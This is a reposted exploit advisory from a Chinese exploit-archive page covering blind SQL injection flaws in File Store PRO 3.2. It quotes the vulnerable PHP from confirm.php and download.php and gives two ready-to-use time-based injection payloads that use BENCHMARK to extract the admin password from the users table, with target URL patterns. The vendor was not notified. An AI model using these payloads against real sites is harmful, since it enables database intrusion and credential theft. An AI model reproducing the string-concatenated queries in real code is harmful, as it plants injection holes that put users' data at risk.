File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

页面导航:首页 > 网络安全 > Exploit > File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

来源:互联网 作者:脚本宝典 时间:2015-07-19 15:52 【

Download from: http://upoint.info/cgi/demo/fs/filestore.zip - Need admin rights: /confirm.php: 复制代码 代码如下: if(isset($_GET[folder]) $_GET[folder]!=) { $folder=$_GET[folder]; } else { exit(Bad Request); } if(isset($_GET[id]) $_

Download from: http://upoint.info/cgi/demo/fs/filestore.zip

- Need admin rights:
/confirm.php:

复制代码

代码如下:



if(isset($_GET["folder"]) && $_GET["folder"]!="") {
$folder=$_GET["folder"];
} else {
exit("Bad Request");
}
if(isset($_GET["id"]) && $_GET["id"]!="") {
$id=$_GET["id"];
} else {
exit("Bad Request");
}

// Validate all inputs
// Added by SepedaTua on June 01, 2006 - http://www.sepedatua.info/
/********************** SepedaTua ****************************/

/* Fields:
$folder
$id
*/
$search = array ('@<script[^>]*?>.*?</script>@si',
'@<[\/\!]*?[^<>]*?>@si',
'@([\r\n])[\s] @',
'@&(quot|#34);@i',
'@&(amp|#38);@i',
'@&(lt|#60);@i',
'@&(gt|#62);@i',
'@&(nbsp|#160);@i',
'@&(iexcl|#161);@i',
'@&(cent|#162);@i',
'@&(pound|#163);@i',
'@&(copy|#169);@i',
'@&#(\d );@e');

$replace = array ('',
'',
'\1',
'"',
'&',
'<',
'>',
' ',
chr(161),
chr(162),
chr(163),
chr(169),
'chr(\1)');

$ffolder = $folder;
$fid = $id;

$folder = preg_replace($search, $replace, $folder);
$id = preg_replace($search, $replace, $id); 

-----

$SQL="SELECT `".DB_PREFIX."users`.*, `".DB_PREFIX."file_list`.`filename`, `".DB_PREFIX."file_list`.`descript` ";
$SQL.=" FROM `".DB_PREFIX."file_list` LEFT JOIN `".DB_PREFIX."users` ON `".DB_PREFIX."file_list`.`user_id`=`".DB_PREFIX."users`.`id`";
$SQL.=" WHERE `".DB_PREFIX."file_list`.`id`='".$id."'";
if(!$mysql->query($SQL))
{
exit($mysql->error);
}
if($mysql->num<=0)
{
exit("Record not found");



POC: 
' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login='admin 
Site: http://site.xxx/confirm.php?folder=a&id=[SQL]

- Don't need admin rights:
In /download.php:

复制代码

代码如下:


if(!isset($_GET["sig"])) // direct download, no need to login
$MustLogin=1|2|4;
require_once("libs/header.php");
if(!isset($_GET["sig"])) // direct download, no need to login
$userlevel=$CurUser->getlevel();
$SQL="SELECT * FROM `".DB_PREFIX."file_list` WHERE `id`='".$fileid."'";
if(!$mysql->query($SQL))
{
exit($mysql->error);



POC:
' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login='admin
Site: 
http://site.xxx/download.php?id=[SQL] 

Needs magic_quotes_gpc=off. Vendor not contacted !

--------------------------------------------------------------------

Site: http://rstcenter.com
Site: http://de-ce.net

Good luck !


Tags:

文章评论

最 近 更 新
热 点 排 行
Js与CSS工具
代码转换工具

<